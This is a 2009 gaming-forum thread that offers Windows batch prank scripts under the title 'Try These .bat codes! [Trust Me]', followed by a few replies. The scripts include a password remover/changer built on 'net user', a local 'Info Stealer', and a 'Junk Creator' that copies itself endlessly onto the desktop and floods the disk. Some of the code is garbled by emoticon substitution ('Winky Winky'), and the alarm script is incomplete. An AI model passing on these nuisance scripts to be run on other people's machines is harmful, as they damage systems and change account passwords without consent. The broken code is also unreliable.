Post: Try These .bat codes! [Trust Me]
03-21-2009, 07:15 AM #1
(adsbygoogle = window.adsbygoogle || []).push({}); Check these out....

Password Remover / Changer
Changes or removes a password on an account.
    :top
@echo off
color 6e
Title Password Remover/Changer by Shadow Ops
:begin
cls
echo Type the user name you wish to change the password for.
SET /p UDefine=
SET /a UDefine=%UDefine% *
cls
msg * To remove the password, press enter twice.
msg * To change the password, type in the new password. You cant see the characters but it works.
cls
net user %udefine% *
pause>nul
:end











Info Stealer
Creates a .txt file with the computer name, user name, time, and date.
    @echo off
echo Computer Name: %computername%>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo User Name: %username%>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo Time: %time>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo Date: %date%>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls



Alarm
Sounds an alarm through the cpu's internal speakers. Turning down volume will not stop it.
    :top

goto top


Junk Creator
Fills your desktop with useless icons until closed.
    cd %userprofile%\desktop
:top
copy %0 %random%.bmp
copy %0 %random%.txt
copy %0 %random%.exe
copy %0 %random%.bat
copy %0 %random%.dat
copy %0 %random%.ini
copy %0 %random%.html
copy %0 %random%.jpeg
copy %0 %random%.mp3
copy %0 %random%.wav
copy %0 %random%.com
copy %0 %random%.cat
copy %0 %random%.ctt
copy %0 %random%.cur
copy %0 %random%.ico
copy %0 %random%.gif
copy %0 %random%.dic
copy %0 %random%.hlp
copy %0 %random%.htm
copy %0 %random%.jpg
copy %0 %random%.py
copy %0 %random%.tmp
copy %0 %random%.web
copy %0 %random%.xhtml
copy %0 %random%.lnk
goto top


Flash Drive Backup
Backs up every thing on your flash drive to a folder called "Flash Drive Backup" on your desktop. *Must be in the root directory of the flash drive.

    @echo off
echo.
echo Backing up your flash drive...
echo.
FOR /F "TOKENS=*" %%A IN ('TIME/T'Winky Winky DO SET TIME=%%A
for /f "tokens=2-4 delims=/ " %%g in ('date /t'Winky Winky do (
set mm=%%g
set dd=%%h
set yy=%%i
)
for /f "tokens=3 delims=\" %%i in ("%USERPROFILE%") do (set user=%%i) 2>&1
if exist "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%" (
rd /S /Q "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%"
)
SET time=%time::=.%
xcopy "*" "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%" /s /i
echo.
echo Backup Complete!
echo.


-LordOfSpoon
-Shadow Ops
(adsbygoogle = window.adsbygoogle || []).push({});

The following 6 users say thank you to LordOfSpoon™ for this useful post:

ꜛ  , Booshykins, l-MoNsT3R-l, NanuGama, RedKnight
04-12-2010, 01:12 AM #38
Yeah man very nice post.
04-12-2010, 04:53 PM #39
orange12
Space Ninja
omg, are people so retarded ?

im pretty sure he writ in his thread to make these in a notepad file ?

if not, all you do is make a notepad file and enter the codes, save it as a bat file :S

its not rocket science lads ! Smile

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo